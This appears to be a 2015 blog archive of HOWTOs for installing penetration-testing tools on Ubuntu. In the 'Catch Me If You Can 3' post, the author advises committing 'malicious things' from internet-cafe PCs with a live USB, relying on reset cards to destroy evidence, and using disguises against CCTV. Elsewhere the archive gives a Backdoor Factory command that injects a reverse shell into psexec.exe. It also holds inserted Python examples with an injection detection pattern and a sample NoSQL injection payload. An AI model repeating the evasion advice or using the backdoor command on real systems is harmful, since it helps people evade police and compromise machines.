Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. Using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.
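The bug class Commix probes for, shown as an added example (not Commix code): a hypothetical "ping this host" web feature whose `host` parameter is spliced into a shell command, beside a hardened version that validates the value against an allow-list and passes it as a single argv element with no shell. The function and variable names are assumptions for illustration.

```python
import ipaddress
import re
import subprocess

# Constructed example, not Commix code: a hypothetical "ping this host" web
# feature whose `host` parameter is the kind of injectable string Commix tests.

SHELL_METACHARS = re.compile(r"[;&|`$<>(){}\n\\\"']")

# RFC 1123-style hostname: labels of letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_command_vulnerable(host):
    """Vulnerable pattern: the parameter is spliced into a shell command line.

    Anything in `host` that /bin/sh treats specially (; | & $ ` and friends)
    changes what gets executed. The string is returned for inspection, not run.
    """
    return "ping -c 1 " + host


def looks_like_injection(value):
    """Detection heuristic for logs or a WAF rule: shell metacharacters in a
    parameter that should only ever hold a host name or address."""
    return SHELL_METACHARS.search(value) is not None


def validate_host(host):
    """Allow-list check: accept an IPv4/IPv6 address or a syntactic hostname,
    reject everything else with ValueError."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("invalid host: %r" % (host,))


def is_safe_host(host):
    """Boolean wrapper around validate_host for callers that do not want exceptions."""
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def build_ping_argv_hardened(host):
    """Hardened pattern: the validated value is one argv element and no shell is
    involved, so metacharacters cannot alter the command even if validation
    were later loosened."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host):
    """Run the hardened form with shell=False and return the exit status."""
    argv = build_ping_argv_hardened(host)
    return subprocess.run(argv, stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode
```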


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is a Web Application Security Analysis & Penetration Testing Framework built on Mozilla technologies.

Most of HconSTF is semi-automated, but you still need your brain to work it out. It can be used in all kinds of security testing stages; it has tools for conducting tasks like:

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.


Install


sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed in the /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start-up. Meanwhile, after the first run you can run PTF from any directory.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using a pre-paid SIM card to do malicious things and the full article is here. However, you might think that there would be a chance of being caught, as TOR network exit nodes may be monitored by law enforcement. Meanwhile, identity registration may be needed to purchase a SIM card in your country. Okay, today I will introduce another method that uses a wired network to do malicious things untraceably.

In my country, there are many "Internet Cafes" which have a pool of computer systems running Windows to provide network gaming or internet services to their customers at a cheap price per hour. Those computer systems are equipped with a "Reborn Card" which resets them to their default settings on every reboot. Normally, the "Internet Cafe" will reboot its computer systems every day.

You can hire a computer system in the "Internet Cafe" and reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom-made pentesting Linux Live USB). Personally, I recommend BackBox as it has some outstanding features, such as a memory wiper.

After your malicious tasks, you can reboot the computer system and it will reset to its default settings. Normally, no data or activities will be logged on the computer system.

When law enforcement traces your IP address, it will direct them to the "Internet Cafe", but they cannot obtain any evidence from the computer pool as those systems have been reborn!

Finally, beware that CCTV may be installed in the "Internet Cafe" or nearby shops and will capture your presence. You may need to do some "make up" when necessary.

That's all! See you.

See Also

Catch Me If You Can
Catch Me If You Can 2
Catch Me If You Can 4

HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open a browser and point it to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto-start on every boot and start it manually. Please note that if OpenVAS is running, the shutdown process will take some time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) patches executable binaries with user-desired shellcode and continues normal execution of the pre-patched state.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

* change the settings where necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : SPIKE on Ubuntu 14.04 LTS

SPIKE is a fuzzer for finding exploitable bugs in application programs.


Install

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make



* For how to use it, please refer to the links at "Reference" below.


Update/Upgrade

Nil


Reference

An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities

Fuzzer Automation with SPIKE


* Or, read the documents at ~/arsenal/SPIKE/SPIKE/documentations


That's all! See you.


HOWTO : MACchanger on Ubuntu 14.04 LTS

A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces.


Install

sudo apt-get install macchanger

macchanger -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : edb-debugger on Ubuntu 14.04 LTS

edb is a cross platform x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on x86 and x86-64 as well as multiple OS's. Linux is the only officially supported platform at the moment, but FreeBSD, OpenBSD, OSX and Windows ports are underway with varying degrees of functionality.


Install

sudo apt-get install git build-essential libboost1.55-all-dev qt5-default libqt5xmlpatterns5-dev

cd ~
mkdir arsenal
cd arsenal
git clone --recursive https://github.com/eteran/edb-debugger.git
cd edb-debugger
./travis_install_capstone.sh
qmake
make
sudo make install
cd ~
mkdir .edb
sed -i -e "s|directory.session.path=|directory.session.path=$HOME/.edb|g" ~/.config/codef00.com/edb.conf
sed -i -e "s|directory.symbol.path=|directory.symbol.path=$HOME/.edb|g" ~/.config/codef00.com/edb.conf
edb



*** Thanks to Vladimir Stupnikov for pointing out the installation error. ***


Update/Upgrade

cd ~/arsenal
rm -R edb-debugger


Repeat the Install procedure as previously mentioned.


Reference

Wiki


That's all! See you.


Thursday, August 27, 2015

HOWTO : Arachni on Ubuntu 14.04 LTS

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Install

cd ~
cd arsenal
wget https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
tar -xvzf arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
cd arachni-1.2.1-0.5.7.1/bin
./arachni_web


Start Firefox and point to http://127.0.0.1:9292

* Default credentials are as follows :

Administrator account

E-mail: admin@admin.admin
Password: administrator

Regular user account

E-mail: user@user.user
Password: regular_user


Update/Upgrade

rm -R ~/arsenal/arachni-1.2.1-0.5.7.1

Then repeat the Install procedure, but download the latest version.


Reference

Wiki


That's all! See you.


Sunday, August 23, 2015

HOWTO : NoSQLMap on Ubuntu 14.04 LTS

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.

It is named as a tribute to Bernardo Damele and Miroslav Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra is planned in future releases.
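The weakness NoSQLMap probes for in MongoDB-backed applications, shown as an added example (not NoSQLMap code): a hypothetical JSON login endpoint whose naive handler copies request values straight into a query filter, so an object sent in place of a string becomes a query operator, beside a hardened handler that accepts only plain strings. The endpoint, function names and sample bodies are constructed for illustration.

```python
import json

# Constructed example, not NoSQLMap code: a hypothetical JSON login endpoint
# backed by MongoDB, where a request body is turned into a query filter.


def build_login_filter_naive(body):
    """Naive handler: values are copied straight from the parsed JSON body.

    MongoDB treats a dict value as an operator expression, so a client that
    sends an object where a string was expected (e.g. {"$ne": ""}) turns the
    equality match into a comparison and can satisfy the lookup without
    knowing the real value.
    """
    return {"username": body.get("username"), "password": body.get("password")}


def contains_operator(value):
    """True when any key at any nesting depth starts with '$' (a query operator).
    Useful as a detection rule over request bodies or application logs."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def build_login_filter_hardened(body):
    """Hardened handler: both credentials must be plain strings of sane length;
    anything else is rejected before it can reach the database."""
    out = {}
    for field in ("username", "password"):
        value = body.get(field)
        if not isinstance(value, str):
            raise ValueError("%s must be a string, got %s" % (field, type(value).__name__))
        if not 1 <= len(value) <= 256:
            raise ValueError("%s has invalid length" % field)
        out[field] = value
    return out


def parse_login_request(raw):
    """Parse a JSON request body (bytes) and apply the hardened checks."""
    body = json.loads(raw)
    if not isinstance(body, dict):
        raise ValueError("body must be a JSON object")
    return build_login_filter_hardened(body)


def is_login_request_safe(raw):
    """Boolean form of parse_login_request, convenient for a request-logging hook."""
    try:
        parse_login_request(raw)
        return True
    except (ValueError, TypeError):
        return False


def naive_filter_from_json(raw):
    """What the naive handler would hand to the database for this body."""
    return build_login_filter_naive(json.loads(raw))


# Constructed sample request bodies (not captured from any real system).
NORMAL_BODY = b'{"username": "alice", "password": "s3cret"}'
INJECTED_BODY = b'{"username": "alice", "password": {"$ne": ""}}'
```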


Install

sudo apt-get install git python-setuptools

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/tcstool/nosqlmap.git
cd nosqlmap
sudo python setup.py install
python nosqlmap.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nosqlmap
git pull origin master
python setup.py install --force



Reference

GitHub
Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : BeEF on Ubuntu 14.04 LTS

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


Install

sudo apt-get install git curl libsqlite3-dev sqlite3 imagemagick ghostscript

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
ruby -v


Install BeEF :

cd ~
mkdir arsenal
cd arsenal
git clone git://github.com/beefproject/beef.git

cd beef
rvm use ruby-2.1.5@beef --create
gem install bundler
bundle install
./beef


Open a browser and go to http://127.0.0.1:3000/ui/panel
* username is "beef" and password is "beef".

* BeEF uses Ruby 2.1.5 by default.


Update/Upgrade

cd ~/arsenal/beef
git pull origin master
bundle install
./update-beef



Reference

Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : SET on Ubuntu 14.04 LTS

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.


Install

sudo apt-get install git python-impacket

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit


sudo python setup.py install

Edit the Metasploit path :

sudo nano /etc/setoolkit/set.config
METASPLOIT_PATH=/home/samiux/arsenal/metasploit-framework


* Replace /home/samiux/arsenal/metasploit-framework with your own Metasploit path

To run it :

sudo setoolkit


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo seupdate



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : Metasploit Framework on Ubuntu 14.04 LTS

Metasploit is an exploitation framework.


Install

sudo apt-get install git build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev default-jre autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev xtightvncviewer libyaml-dev libffi-dev libgmp-dev

cd ~
mkdir arsenal
cd arsenal

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.6
rvm use 2.1.6 --default
ruby -v


* Metasploit Framework uses Ruby 2.1.6 by default

Install NMap :

* Install NMap if you do not have it installed; otherwise, skip it.

cd ~/arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install


Configure PostgreSQL :

sudo -s
su postgres

createuser msf -P -S -R -D

* enter "msf" as password
createdb -O msf msf
exit
exit


Install Metasploit Framework :

cd ~/arsenal
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
rvm --default use ruby-2.1.6@metasploit-framework --create
gem install bundler
bundle install


Configure Metasploit :

cp ~/arsenal/metasploit-framework/config/database.yml.example ~/arsenal/metasploit-framework/config/database.yml
nano ~/arsenal/metasploit-framework/config/database.yml

development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: localhost
  port: 5432
  pool: 75
  timeout: 5

sudo sh -c "echo export MSF_DATABASE_CONFIG=/home/samiux/arsenal/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile


* Replace /home/samiux with your own home directory.

To run it :

cd ~/arsenal
cd metasploit-framework
sudo service postgresql start
msfconsole
sudo service postgresql stop



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/metasploit-framework
git pull origin master
msfupdate



Reference

See also : NMap


That's all! See you.


Saturday, August 22, 2015

HOWTO : John on Ubuntu 14.04 LTS

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.


Install

sudo apt-get install build-essential libssl-dev

cd ~
mkdir arsenal
cd arsenal

wget http://www.openwall.com/john/j/john-1.8.0-jumbo-1.tar.gz
tar -xvzf john-1.8.0-jumbo-1.tar.gz
cd john-1.8.0-jumbo-1/src

./configure
make clean
make

cd ../run
./john --help



* you can also install by sudo apt-get install john john-data


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


Go to Official site to download the source and compile it as mentioned above.


Reference

Please install Nvidia or AMD Graphic related drivers before installing John when necessary.


That's all! See you.


HOWTO : NetCat on Ubuntu 14.04 LTS

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.


Install

sudo apt-get install netcat-traditional
sudo update-alternatives --config nc


select /bin/nc.traditional by entering "2"

nc -h


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : CMSMap on Ubuntu 14.04 LTS

CMSmap is a Python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/Dionach/CMSmap.git
cd CMSmap
python cmsmap.py -t http://www.google.com



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/CMSmap
git pull origin master



Reference

Nil


That's all! See you.


Thursday, August 20, 2015

HOWTO : ZAP on Ubuntu 14.04 LTS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.


Install

sudo apt-get install default-jre unzip

cd ~
mkdir arsenal
cd arsenal

wget https://github.com/zaproxy/zaproxy/releases/download/w2015-08-12/ZAP_WEEKLY_D-2015-08-12.zip
unzip ZAP_WEEKLY_D-2015-08-12.zip
rm ZAP_WEEKLY_D-2015-08-12.zip
cd ZAP_D-2015-08-12
./zap.sh



* ZAP_WEEKLY_D-2015-08-12.zip as example.
* The ZAP team generates weekly releases of ZAP from the trunk, typically every Monday.
These are just intended for people who want to use all of the features we've added since the last 'full' release but don't want the hassle of building ZAP from the source code.
While we endeavor to ensure that weekly releases are robust, things may be broken or only partially implemented.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


cd ~/arsenal/

Go to Download to download ZAP Weekly and repeat the procedure of "Install" previously mentioned.


Reference

Wiki

Video


That's all! See you.

HOWTO : Burp Suite on Ubuntu 14.04 LTS

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Install

sudo apt-get install curl default-jre

cd ~
mkdir arsenal
cd arsenal
mkdir burpsuite
cd burpsuite
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar
java -jar -Xmx1024m burpsuite_free.jar



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/burpsuite
rm burpsuite_free.jar
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar



Reference

Getting Started

Documentation

See also : Professional Edition


That's all! See you.

Wednesday, August 19, 2015

HOWTO : Weevely on Ubuntu 14.04 LTS

Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.


Install

sudo apt-get install git build-essential python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/epinna/weevely3.git
cd weevely3
./weevely.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~/arsenal/weevely3
git pull origin master



Reference

Wiki


That's all! See you.

Tuesday, August 18, 2015

HOWTO : SQLMap on Ubuntu 14.04 LTS

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -hh



Update/Upgrade

cd ~/arsenal/sqlmap
python sqlmap.py --update



Reference

Wiki

See also : SQLMap Web GUI


That's all! See you.

HOWTO : THC-Hydra on Ubuntu 14.04 LTS

Passwords are the number one security hole, as every password security study shows.

THC-Hydra is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

Install

sudo apt-get install git build-essential libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev libafpclient-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
./hydra -h
./xhydra



* Oracle, NCP and SAP/R3 are not supported in this build as there are no libraries available from the repos
* you can install by sudo apt-get install hydra hydra-gtk


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/thc-hydra
git pull origin master
make clean
./configure
make



Reference

Official site


That's all! See you.

HOWTO : NMap on Ubuntu 14.04 LTS

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Install

sudo apt-get install git build-essential

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
sudo nmap -sS -sV 192.168.0.100



* or you can install by sudo apt-get install nmap


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nmap
git pull origin master
make clean
make
sudo make install



Reference

Reference Guide


That's all! See you.

HOWTO : Masscan on Ubuntu 14.04 LTS

Masscan is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.

It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges.

NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.


Install

To install Masscan on Ubuntu 14.04.03 LTS Desktop :

sudo apt-get install git build-essential libpcap-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/robertdavidgraham/masscan.git
cd masscan
make
sudo bin/masscan -p80,8000-8100 10.0.0.0/8



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/masscan
git pull origin master
make clean
make



Reference

Official site

Wiki


That's all! See you.


HOWTO : Spiderfoot on Ubuntu 14.04 LTS

SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname or network subnet.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organisation is freely providing for attackers to use against you.


Install

To install Spiderfoot on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-dev python-pip python-m2crypto python-netaddr python-pypdf python-stem python-lxml

sudo pip install cherrypy mako


cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot
python sf.py


Then, use your Firefox to browse http://127.0.0.1:5001/


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install cherrypy mako --upgrade

cd ~/arsenal/spiderfoot
git pull origin master


Reference

Documentation


That's all! See you.

HOWTO : Recon-ng on Ubuntu 14.04 LTS

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!


Install

To install Recon-ng on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml

sudo pip install dicttoxml


cd ~
mkdir arsenal
cd arsenal
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
./recon-ng



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install dicttoxml --upgrade

cd ~/arsenal/recon-ng
git pull origin master



Reference

Usage Guide

Development Guide


That's all! See you.

Wednesday, August 12, 2015

REVIEW : First Impression on Kali Linux 2.0

*** Please note that all the tests were done on a Linux host (Ubuntu 14.04.3); a Windows host may give different results. ***

*** Updated on August 14, 2015 : VirtualBox 5.0.2 for Linux fixed the slow speed (VMM: fixed an issue causing artifically high load averages on Linux hosts). ***

Kali Linux 2.0 was released today (August 11, 2014 EST). I downloaded the 64-bit full version and installed it on VirtualBox 5.0. The host computer has an Intel Celeron(R) CPU N2930 @ 1.83GHz × 4 and 8 GB RAM. I assigned 5 GB RAM to Kali Linux 2.0. It runs quite slowly with 5 GB RAM on my VirtualBox 5.0. Meanwhile, the sound is always muted on every start-up even if you have set it before.





(A) Installation

When installing via the non-graphical interface, you may find no network mirror repos; you need to bypass this by selecting "Continue without a network mirror? Yes" and we will edit /etc/apt/sources.list later. The graphical interface may have the same problem too.

After the installation is complete, edit /etc/apt/sources.list if you encountered no mirror repos during the install.

nano /etc/apt/sources.list

The content of the file should look like this :

deb http://http.kali.org/kali sana main non-free contrib
